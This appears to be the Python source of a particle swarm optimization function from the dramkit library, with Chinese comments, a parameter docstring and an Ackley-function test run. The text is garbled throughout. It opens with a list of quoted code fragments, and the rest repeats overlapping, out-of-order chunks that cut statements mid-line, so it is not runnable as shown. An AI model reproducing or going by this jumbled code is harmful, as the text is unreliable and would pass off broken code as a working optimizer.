更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix:", "* dim if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10", "import pandas as pd from dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from", "# 迭代寻优 for l in range(0, max_iter): # 位置过界处理 pos = np.clip(pos, x_lb,", "| c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值", "+ \\ # c1 * r1 * (pBest[i, j] - pos[i,j]) + \\", "# 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i] = fval pBest[i, :] = pos[i,", "0.2, 'w_fix': False, 'c1': 2, 'c2': 2} # logger = simple_logger() logger =", "'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2': 2} # logger = simple_logger() logger", "w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger =", "# 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs =", "= pos + vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] =", "if pBestVals[i] > fval: pBestVals[i] = fval pBest[i, :] = pos[i, :].copy() #", "目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log", "(l+1) % nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {},", "> v_maxs[j]: # vel[i, j] = v_maxs[j] # if vel[i, j] < v_mins[j]:", "gBestVal > fval: gBestVal = fval gBest = pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if", "if not isinstance(x_lb, list): x_lb = [x_lb] * dim if not isinstance(x_ub, list):", "+ vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim))", "'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2': 2} # logger =", "Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy '''", "strt_tm = time.time() objf = TestFuncs.ackley parms_func = {'func_name': objf.__name__, 'x_lb': -10, 'x_ub':", "| dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) |", "False, 'c1': 2, 'c2': 2} # logger = simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True)", "pos) vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos = pos + vel", "func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__': import pandas as pd from", "---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含:", "opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name']", "目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs']", "popsize): # for j in range (0, dim): # r1 = random.random() #", "样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值", "w * vel[i, j] + \\ # c1 * r1 * (pBest[i, j]", "* r2 * (gBest[j] - pos[i, j]) # # 速度过界处理 # if vel[i,", "# 初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值", "'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2': 2} #", "parms_log = {'logger': logger, 'nshow': 10} parms_log = {'logger': logger, 'nshow': 100} func_opter_parms", "-*- coding: utf-8 -*- import time import numpy as np from dramkit.gentools import", "'nshow': 10} parms_log = {'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log)", "time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list): x_lb = [x_lb] *", "if opter_name == '' or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name #", "objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i + fval) / (i+1) #", "for j in range (0, dim): # r1 = random.random() # r2 =", "# c1 * r1 * (pBest[i, j] - pos[i,j]) + \\ # c2", "2} # logger = simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger':", "https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name == ''", "parms_func = {'func_name': objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}} parms_opter", "= {'func_name': objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}} parms_opter =", "random.random() # r2 = random.random() # # 速度更新 # vel[i, j] = w", "from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm = time.time() objf =", "'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False,", "func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb,", "(gBest - pos) vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos = pos", "TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo`", "= func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] =", "/ (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i] = fval pBest[i, :]", "<reponame>Genlovy-Hoo/dramkit # -*- coding: utf-8 -*- import time import numpy as np from", "%H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list): x_lb = [x_lb] * dim if", "更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max", "dim)) r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel = w * vel +", "'.format(opter_name, func_name, l+1) + \\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time()", "= func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not", "位置更新 # pos[i, j] = pos[i, j] + vel[i, j] # 速度和位置更新 r1", "isinstance(x_ub, list): x_ub = [x_ub] * dim if not isinstance(v_maxs, list): if isnull(v_maxs):", "pd from dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import plot_series,", "in range(0, max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean = 0", "类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数", "numpy as np from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf,", "| nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4", "# 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean = 0 for i in", "range(0, popsize): fval = objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i +", "opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs", "pos[i,j]) + \\ # c2 * r2 * (gBest[j] - pos[i, j]) #", "pos = rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter)", "x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean =", "nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if", "日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- -", "pBestVals[i] > fval: pBestVals[i] = fval pBest[i, :] = pos[i, :].copy() # 更新全局最优解", "> fval: gBestVal = fval gBest = pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if not", "v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)] else: v_maxs = [v_maxs]", "+ vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if", "# 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if nshow: if (l+1) %", "* dim v_mins = [-x for x in v_maxs] # 初始化 vel =", "gBestVal = float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化", "+ \\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm)", "l+1) + \\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S'))", "if nshow: if (l+1) % nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name']", "if __name__ == '__main__': import pandas as pd from dramkit.optimizer.base_funcs import TestFuncs from", "l * ((w_max - w_min) / max_iter) else: if not 0 < w_fix", "{}, iter: {}, '.format(opter_name, func_name, l+1) + \\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms", "isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)] else: v_maxs =", "/ max_iter) else: if not 0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!')", "# r1 = random.random() # r2 = random.random() # # 速度更新 # vel[i,", "gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') # 全局最优值 pos = rand_init(popsize,", "| parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms :", "if gBestVal > fval: gBestVal = fval gBest = pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强)", ":].copy() # 更新全局最优解 if gBestVal > fval: gBestVal = fval gBest = pos[i,", "更新全局最优解 if gBestVal > fval: gBestVal = fval gBest = pos[i, :].copy() #", "fval = objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i + fval) /", "# 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel", "vel[i, j] > v_maxs[j]: # vel[i, j] = v_maxs[j] # if vel[i, j]", "parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max:", "dim v_mins = [-x for x in v_maxs] # 初始化 vel = np.zeros((popsize,", "func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__':", "(gBest[j] - pos[i, j]) # # 速度过界处理 # if vel[i, j] > v_maxs[j]:", "[-x for x in v_maxs] # 初始化 vel = np.zeros((popsize, dim)) # 初始速度", "logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ----------", "pBest[i, :] = pos[i, :].copy() # 更新全局最优解 if gBestVal > fval: gBestVal =", "time import numpy as np from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init", "* (gBest - pos) vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos =", "if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _", "https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name):", "simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow': 10} parms_log", "# 位置更新 # pos[i, j] = pos[i, j] + vel[i, j] # 速度和位置更新", "= func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 =", "pos) + c2 * r2 * (gBest - pos) vel = np.clip(vel, v_mins,", "logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S'))", "# if vel[i, j] < v_mins[j]: # vel[i, j] = v_mins[j] # #", "not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max - w_min)", "% nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter:", "popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min", "func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10,", "= np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') # 全局最优值 pos = rand_init(popsize, dim,", "opter_name == '' or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数", "保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优", "= func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize']", "dim)) # 速度更新 vel = w * vel + c1 * r1 *", "v_maxs = [v_maxs] * dim v_mins = [-x for x in v_maxs] #", "惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log:", "fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal)", "自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数", "(fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i] =", "vel[i, j] < v_mins[j]: # vel[i, j] = v_mins[j] # # 位置更新 #", "---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name", "'dim': 10, 'kwargs': {}} parms_opter = {'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs':", "w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 |", "fval pBest[i, :] = pos[i, :].copy() # 更新全局最优解 if gBestVal > fval: gBestVal", ":], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解)", "# 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max =", "dim if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for", "+ c1 * r1 * (pBest - pos) + c2 * r2 *", "isinstance(x_lb, list): x_lb = [x_lb] * dim if not isinstance(x_ub, list): x_ub =", "1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器", "# 全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve", "# # 速度更新 # vel[i, j] = w * vel[i, j] + \\", "func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) + \\ 'best fval:", "目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim |", "= w_fix # # 速度和位置更新 # for i in range(0, popsize): # for", "max_iter) else: if not 0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w", "惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2:", "func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) + \\", "Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题", "get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm = time.time() objf = TestFuncs.ackley parms_func =", "r1 * (pBest - pos) + c2 * r2 * (gBest - pos)", "默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow:", "= np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优 for l", "x_lb, x_ub) fvals_mean = 0 for i in range(0, popsize): fval = objf(pos[i,", "# 速度过界处理 pos = pos + vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] =", ": FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name", "= np.clip(pos, x_lb, x_ub) fvals_mean = 0 for i in range(0, popsize): fval", "convergence_curve_mean[l] = fvals_mean if nshow: if (l+1) % nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name']", "全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve =", "x_ub) fvals_mean = 0 for i in range(0, popsize): fval = objf(pos[i, :],", "\\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve)", "opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {}, '.format(opter_name, func_name,", "# 保存全局最优解 gBestVal = float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub)", "w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] #", ":class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim:", "10, 'kwargs': {}} parms_opter = {'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5,", "每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if nshow: if (l+1) % nshow", "= func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger']", "j] = v_mins[j] # # 位置更新 # pos[i, j] = pos[i, j] +", "ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # # 速度和位置更新 # for i in range(0,", "pos[i, j]) # # 速度过界处理 # if vel[i, j] > v_maxs[j]: # vel[i,", "w_fix # # 速度和位置更新 # for i in range(0, popsize): # for j", "vel = w * vel + c1 * r1 * (pBest - pos)", "not isinstance(x_lb, list): x_lb = [x_lb] * dim if not isinstance(x_ub, list): x_ub", "screen_show=True) # parms_log = {'logger': logger, 'nshow': 10} parms_log = {'logger': logger, 'nshow':", "[x_lb] * dim if not isinstance(x_ub, list): x_ub = [x_ub] * dim if", "func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter", "objf = TestFuncs.ackley parms_func = {'func_name': objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim': 10,", "func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve,", "须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 |", "TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import", "自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含:", "c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow =", "not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in", "------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' #", "* r1 * (pBest[i, j] - pos[i,j]) + \\ # c2 * r2", "= pos[i, j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2", "边界统一为列表 if not isinstance(x_lb, list): x_lb = [x_lb] * dim if not isinstance(x_ub,", "FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim |", "# 速度和位置更新 # for i in range(0, popsize): # for j in range", "utf-8 -*- import time import numpy as np from dramkit.gentools import isnull from", "# vel[i, j] = v_maxs[j] # if vel[i, j] < v_mins[j]: # vel[i,", "速度过界处理 pos = pos + vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal", "vel[i, j] + \\ # c1 * r1 * (pBest[i, j] - pos[i,j])", "= time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list): x_lb = [x_lb]", "func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim =", "x_ub = [x_ub] * dim if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs =", "j] - pos[i,j]) + \\ # c2 * r2 * (gBest[j] - pos[i,", "import isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization)", "每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim)", "==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {}, '.format(opter_name,", "pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max -", "v_mins[j] # # 位置更新 # pos[i, j] = pos[i, j] + vel[i, j]", "simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm = time.time() objf", "func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize", "i in range(0, popsize): fval = objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean =", "= {'logger': logger, 'nshow': 10} parms_log = {'logger': logger, 'nshow': 100} func_opter_parms =", "= time.time() objf = TestFuncs.ackley parms_func = {'func_name': objf.__name__, 'x_lb': -10, 'x_ub': 10,", "= get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow': 10} parms_log = {'logger':", "w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # # 速度和位置更新 #", "dim if not isinstance(x_ub, list): x_ub = [x_ub] * dim if not isinstance(v_maxs,", "目标函数值 fvals_mean = (fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] >", ": function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb:", "| w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子", "'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim", "dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter:", "迭代寻优 for l in range(0, max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub)", "w_min) / max_iter) else: if not 0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0,", "# pos[i, j] = pos[i, j] + vel[i, j] # 速度和位置更新 r1 =", "range (0, dim): # r1 = random.random() # r2 = random.random() # #", "| parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs:", "func_name, l+1) + \\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d", "for l in range(0, max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean", "r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel = w", "np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 